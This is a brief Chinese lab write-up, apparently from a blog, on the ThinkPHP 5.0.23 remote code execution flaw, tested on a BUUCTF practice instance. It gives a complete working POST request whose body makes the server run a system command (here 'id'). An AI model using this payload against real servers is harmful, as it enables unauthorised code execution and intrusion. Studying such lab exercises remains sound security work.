[ThinkPHP]5.0.23-Rce
环境搭建
POC

老懒狗选择直接buu,链接
http://node3.buuoj.cn:27512/
直接用poc打一下:
POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:27512
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
直接在burp的repeater模块里面构造就行了:

本文介绍了一个存在于 ThinkPHP 5.0.23 版本中的远程代码执行 (RCE) 漏洞,并提供了环境搭建步骤、漏洞利用 PoC 代码及演示过程。
最低0.47元/天 解锁文章
2918

被折叠的 条评论
为什么被折叠?



